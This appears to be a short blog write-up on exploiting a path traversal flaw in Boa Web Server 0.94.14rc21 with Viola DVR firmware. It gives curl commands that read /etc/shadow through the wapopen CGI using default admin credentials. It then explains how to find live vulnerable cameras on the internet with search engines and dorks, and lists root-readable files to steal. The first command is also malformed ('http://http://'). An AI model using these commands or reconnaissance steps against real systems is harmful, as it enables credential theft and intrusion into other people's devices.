BrainScope

Exploiting Boa Webserver 0.94.14rc21 Path Traversal

Author:
Published on:

André Eichhofer

Precondition

There is a directory traversal vulnerability in Boa Web Server. Affected is Boa Web Server Version 0.94.14rc21. The server is vulnerable in combination with the Viola DVR VIO-4/1000 firmware, which must be installed on the server.

The /cgi-bin/wapopen application must be running on the server which controls the webcamera. The applications uses the FILECAMERA variable which allows the injection of ../.. due to unproper input sanitisation. The variable can be used with the value FILECAMERA=../../etc/shadow%00 which retrieves the /etc/shadow file.

The vulnerability can be exploited using the following command:

curl "http://http://127.0.0.1/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0

The exploit should also work without url encoding

curl "http://127.0.0.1/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"

Note: Use the hyphens when using curl as bash will interpret the url as string

Reconnaissance

Vulnerable are hosts runnning Boa Web Servers 0.94.14rc21 and having the wapopen application enabled.

Search for affected machines in https://www.criminalip.io. Use search paramater product_version with 0.94.14r.

The engine will output also server version 0.94.14rc19, but there should be enough results with 0.94.14rc21. Search engines (shodan, censys, criminalip) are not able to find the full version number 0.94.14rc21. You can try to modify the search string or only search for Boa Web Server.

There must be the wapopen application enabled at the server. Target hosts must contain the url

  • http://<domain>/cgi-bin/wapopen

Use Dorks

  • inurl:/cgi-bin/wapopen

Exploitation

In many cases the server is running on a camera where the Viola DVR VIO-4/1000 firmware is installed. The firmware suffers the above path traversal vulnerability in combination with the server. The attacker is moving with the wapopen cgi. The wapopen cgi runs with root privileges, so all files can be accessed.

Following files can be found on the server:

  • /etc/shadow
    could be exploited when SSH is enabled

  • /etc/boa/boa.conf
    Contains the configuration setting and the location of the log files

  • bin/sh
    sh will most likely be installed on the server

Locate the Boa PID:

Access /proc/self/stat or proc/self/status and look for parent ppid which is the PID of the Boa server.

More

searchsploit -x BOA Web Server 0.94.14rc21 - Arbitrary File Access

Viola DVR VIO-4/1000 path traversal
exploit-db.com/papers/44003
ush.it/team/ush/hack_httpd_escape/adv.txt
coresecurity.com/sites/default/files/private-files/publications/2016/05/corelabs-ipcams-research-falcon-riva.pdf